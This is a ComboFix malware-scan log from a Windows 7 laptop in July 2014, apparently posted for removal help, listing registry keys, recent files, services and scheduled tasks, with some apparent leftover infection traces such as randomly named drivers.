@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
Completion time: 2014-07-17  09:02:29
ComboFix-quarantined-files.txt  2014-07-17 13:02
ComboFix2.txt  2014-07-17 02:08
.
Pre-Run: 288,661,917,696 bytes free
Post-Run: 288,173,723,648 bytes free
.
- - End Of File - - F15E449369C4A18FF9B3694FEA5F2636
A36C5E4F47E84449FF07ED3517B43A31

COMBOFIX  222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222

ComboFix 14-07-16.02 - Ric 07/17/2014   9:39.3.8 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8180.6620 [GMT -4:00]
Running from: c:\users\Ric\Desktop\ComboFix.exe
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((   Files Created from 2014-06-17 to 2014-07-17  )))))))))))))))))))))))))))))))
.
.
2014-07-17 13:56 . 2014-07-17 13:56 -------- d-----w- c:\users\TEMP.Dell-XPS-1645\AppData\Local\temp
2014-07-17 13:56 . 2014-07-17 13:56 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-07-16 14:48 . 2014-07-17 12:41 -------- d-----w- C:\FRST
2014-07-14 16:08 . 2014-07-14 17:27 -------- d-----w- c:\windows\SysWow64\wbem\Performance
2014-07-14 15:20 . 2014-07-14 15:20 -------- d-----w- C:\RegBackup
2014-07-14 13:20 . 2014-07-14 13:20 -------- d-----w- c:\program files (x86)\Tweaking.com
2014-07-11 19:19 . 2014-07-11 19:19 -------- d-----w- c:\windows\ERUNT
2014-07-11 18:58 . 2014-07-12 17:01 -------- d-----w- C:\Kits
2014-07-06 18:20 . 2010-08-30 12:34 536576 ----a-w- c:\windows\SysWow64\sqlite3.dll
2014-07-06 18:17 . 2014-07-13 18:11 -------- d-----w- C:\AdwCleaner
2014-07-06 18:15 . 2014-07-06 18:15 -------- d-----w- c:\users\Ric\AppData\Local\GHISLER
2014-07-06 15:47 . 2014-07-14 15:00 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\programdata\Malwarebytes
2014-07-06 15:46 . 2014-05-12 11:26 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-07-06 15:46 . 2014-05-12 11:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-07-06 15:46 . 2014-05-12 11:25 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-07-05 18:22 . 2014-07-09 19:33 -------- d-----w- c:\users\roy
2014-07-05 16:52 . 2014-07-13 17:30 -------- d-----w- C:\Roy
2014-06-25 23:54 . 2014-06-26 00:02 -------- d-----w- c:\users\Ric\AppData\Roaming\Feeqvena
2014-06-25 23:50 . 2014-07-06 17:39 -------- d-----w- c:\programdata\IculOnse
2014-06-18 13:49 . 2014-06-18 13:49 -------- d-----w- c:\programdata\Package Cache
2014-06-18 13:48 . 2014-06-18 13:48 -------- d-----w- C:\TDSSKiller_Quarantine
2014-06-18 13:47 . 2014-06-18 13:47 -------- d-----w- C:\AMD
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-16 23:35 . 2012-03-31 15:56 699056 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-07-16 23:35 . 2011-05-18 19:14 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-11 11:40 . 2011-02-26 01:47 95414520 ----a-w- c:\windows\system32\MRT.exe
2014-06-03 20:51 . 2011-02-26 06:12 18960 ----a-w- c:\windows\system32\drivers\LNonPnP.sys
2014-05-30 10:21 . 2014-06-11 11:33 23414784 ----a-w- c:\windows\system32\mshtml.dll
2014-05-30 10:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-05-30 10:02 . 2014-06-11 11:33 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-05-30 09:45 . 2014-06-11 11:33 2768384 ----a-w- c:\windows\system32\iertutil.dll
2014-05-30 09:39 . 2014-06-11 11:33 548352 ----a-w- c:\windows\system32\vbscript.dll
2014-05-30 09:39 . 2014-06-11 11:33 66048 ----a-w- c:\windows\system32\iesetup.dll
2014-05-30 09:38 . 2014-06-11 11:33 48640 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-05-30 09:28 . 2014-06-11 11:33 51200 ----a-w- c:\windows\system32\jsproxy.dll
2014-05-30 09:27 . 2014-06-11 11:33 33792 ----a-w- c:\windows\system32\iernonce.dll
2014-05-30 09:24 . 2014-06-11 11:33 574976 ----a-w- c:\windows\system32\ieui.dll
2014-05-30 09:21 . 2014-06-11 11:33 139264 ----a-w- c:\windows\system32\ieUnatt.exe
2014-05-30 09:21 . 2014-06-11 11:33 111616 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-05-30 09:20 . 2014-06-11 11:33 752640 ----a-w- c:\windows\system32\jscript9diag.dll
2014-05-30 09:11 . 2014-06-11 11:33 940032 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-05-30 09:08 . 2014-06-11 11:33 5782528 ----a-w- c:\windows\system32\jscript9.dll
2014-05-30 09:06 . 2014-06-11 11:33 452096 ----a-w- c:\windows\system32\dxtmsft.dll
2014-05-30 09:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\SysWow64\mshtml.tlb
2014-05-30 08:55 . 2014-06-11 11:33 38400 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-05-30 08:49 . 2014-06-11 11:33 195584 ----a-w- c:\windows\system32\msrating.dll
2014-05-30 08:46 . 2014-06-11 11:33 85504 ----a-w- c:\windows\system32\mshtmled.dll
2014-05-30 08:44 . 2014-06-11 11:33 455168 ----a-w- c:\windows\SysWow64\vbscript.dll
2014-05-30 08:44 . 2014-06-11 11:33 295424 ----a-w- c:\windows\system32\dxtrans.dll
2014-05-30 08:43 . 2014-06-11 11:33 61952 ----a-w- c:\windows\SysWow64\iesetup.dll
2014-05-30 08:42 . 2014-06-11 11:33 51200 ----a-w- c:\windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:35 . 2014-06-11 11:33 608768 ----a-w- c:\windows\system32\ie4uinit.exe
2014-05-30 08:29 . 2014-06-11 11:33 631808 ----a-w- c:\windows\system32\msfeeds.dll
2014-05-30 08:28 . 2014-06-11 11:33 112128 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-05-30 08:27 . 2014-06-11 11:33 592896 ----a-w- c:\windows\SysWow64\jscript9diag.dll
2014-05-30 08:24 . 2014-06-11 11:33 1249280 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-05-30 08:23 . 2014-06-11 11:33 2040832 ----a-w- c:\windows\system32\inetcpl.cpl
2014-05-30 08:10 . 2014-06-11 11:33 32256 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56 . 2014-06-11 11:33 2266112 ----a-w- c:\windows\system32\wininet.dll
2014-05-30 07:56 . 2014-06-11 11:33 4244992 ----a-w- c:\windows\SysWow64\jscript9.dll
2014-05-30 07:50 . 2014-06-11 11:33 1068032 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49 . 2014-06-11 11:33 1964544 ----a-w- c:\windows\SysWow64\inetcpl.cpl
2014-05-30 07:43 . 2014-06-11 11:33 13522944 ----a-w- c:\windows\system32\ieframe.dll
2014-05-30 07:30 . 2014-06-11 11:33 1398272 ----a-w- c:\windows\system32\urlmon.dll
2014-05-30 07:21 . 2014-06-11 11:33 1790976 ----a-w- c:\windows\SysWow64\wininet.dll
2014-05-30 07:13 . 2014-06-11 11:33 846336 ----a-w- c:\windows\system32\ieapfltr.dll
2014-05-09 06:14 . 2014-05-14 13:38 477184 ----a-w- c:\windows\system32\aepdu.dll
2014-05-09 06:11 . 2014-05-14 13:38 424448 ----a-w- c:\windows\system32\aeinv.dll
2014-05-08 09:32 . 2014-06-11 11:32 3178496 ----a-w- c:\windows\system32\rdpcorets.dll
2014-05-08 09:32 . 2014-06-11 11:32 16384 ----a-w- c:\windows\system32\RdpGroupPolicyExtension.dll
2014-04-25 02:34 . 2014-06-11 11:32 801280 ----a-w- c:\windows\system32\usp10.dll
2014-04-25 02:06 . 2014-06-11 11:32 626688 ----a-w- c:\windows\SysWow64\usp10.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"{90140000-003D-0000-1000-0000000FF1CE}"="del" [X]
.
c:\users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-5-19 33322312]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R0 xnvdb;xnvdb;c:\windows\System32\drivers\cixf.sys;c:\windows\SYSNATIVE\drivers\cixf.sys [x]
R1 qnmokglx;qnmokglx;c:\windows\system32\drivers\qnmokglx.sys;c:\windows\SYSNATIVE\drivers\qnmokglx.sys [x]
R1 smvowoli;smvowoli;c:\windows\system32\drivers\smvowoli.sys;c:\windows\SYSNATIVE\drivers\smvowoli.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RoxWatch12;Roxio Hard Drive Watcher 12;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [x]
R2 WMCoreService;Mobile Broadband Service;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode [x]
R3 bcbtums;Bluetooth USB LD Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
R3 btusbflt;Bluetooth USB Filter;c:\windows\system32\drivers\btusbflt.sys;c:\windows\SYSNATIVE\drivers\btusbflt.sys [x]
R3 btwampfl;btwampfl;c:\windows\system32\DRIVERS\btwampfl.sys;c:\windows\SYSNATIVE\DRIVERS\btwampfl.sys [x]
R3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
R3 BVRPMPR5a64;BVRPMPR5a64 NDIS Protocol Driver;c:\windows\system32\drivers\BVRPMPR5a64.SYS;c:\windows\SYSNATIVE\drivers\BVRPMPR5a64.SYS [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 qrkis;Tether Miniport;c:\windows\system32\DRIVERS\qrkis.sys;c:\windows\SYSNATIVE\DRIVERS\qrkis.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RoxMediaDB13;RoxMediaDB13;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [x]
R3 SwitchBoard;Adobe SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TurboBoost;TurboBoost;c:\program files\Intel\TurboBoost\TurboBoost.exe;c:\program files\Intel\TurboBoost\TurboBoost.exe [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S0 Sahdad64;HDD Filter Driver;c:\windows\System32\Drivers\Sahdad64.sys;c:\windows\SYSNATIVE\Drivers\Sahdad64.sys [x]
S0 Saibad64;Volume Filter Driver;c:\windows\System32\Drivers\Saibad64.sys;c:\windows\SYSNATIVE\Drivers\Saibad64.sys [x]
S1 SaibVdAd64;Virtual Disk Driver;c:\windows\system32\Drivers\SaibVdAd64.sys;c:\windows\SYSNATIVE\Drivers\SaibVdAd64.sys [x]
S2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269;Roxio SAIB Service;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [x]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe;c:\windows\SYSNATIVE\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 BcmBtRSupport;Bluetooth Driver Management Service;c:\windows\system32\BtwRSupportService.exe;c:\windows\SYSNATIVE\BtwRSupportService.exe [x]
S2 BOT4Service;BOT4Service;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe [x]
S2 Fitbit Connect;Fitbit Connect Service;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 PCPitstop Scheduling;PCPitstop Scheduling;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe [x]
S2 QDLService2kDell;Qualcomm Gobi 2000 Download Service (Dell);c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe;c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [x]
S2 rimspci;rimspci;c:\windows\system32\DRIVERS\rimspe64.sys;c:\windows\SYSNATIVE\DRIVERS\rimspe64.sys [x]
S2 risdpcie;risdpcie;c:\windows\system32\DRIVERS\risdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\risdpe64.sys [x]
S2 rixdpcie;rixdpcie;c:\windows\system32\DRIVERS\rixdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\rixdpe64.sys [x]
S2 TurboB;Turbo Boost UI Monitor driver;c:\windows\system32\DRIVERS\TurboB.sys;c:\windows\SYSNATIVE\DRIVERS\TurboB.sys [x]
S3 CtClsFlt;Creative Camera Class Upper Filter Driver;c:\windows\system32\DRIVERS\CtClsFlt.sys;c:\windows\SYSNATIVE\DRIVERS\CtClsFlt.sys [x]
S3 ITECIRfilter;ITECIR Filter Driver;c:\windows\system32\DRIVERS\ITECIRfilter.sys;c:\windows\SYSNATIVE\DRIVERS\ITECIRfilter.sys [x]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\DRIVERS\k57nd60a.sys;c:\windows\SYSNATIVE\DRIVERS\k57nd60a.sys [x]
S3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;c:\windows\system32\DRIVERS\netw5v64.sys;c:\windows\SYSNATIVE\DRIVERS\netw5v64.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-06-16 13:09 1091912 ----a-w- c:\program files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-07-17 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-31 23:36]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-14 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
uDefault_Search_URL = hxxp://www.google.com/ie
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
Trusted Zone: dell.com
TCP: DhcpNameServer = 192.168.0.1 205.171.3.26 205.171.2.26
.
- - - - ORPHANS REMOVED - - - -
.
AddRemove-centurytoolbar - c:\program files (x86)\centurytoolbar\uninstall.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-303777)
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
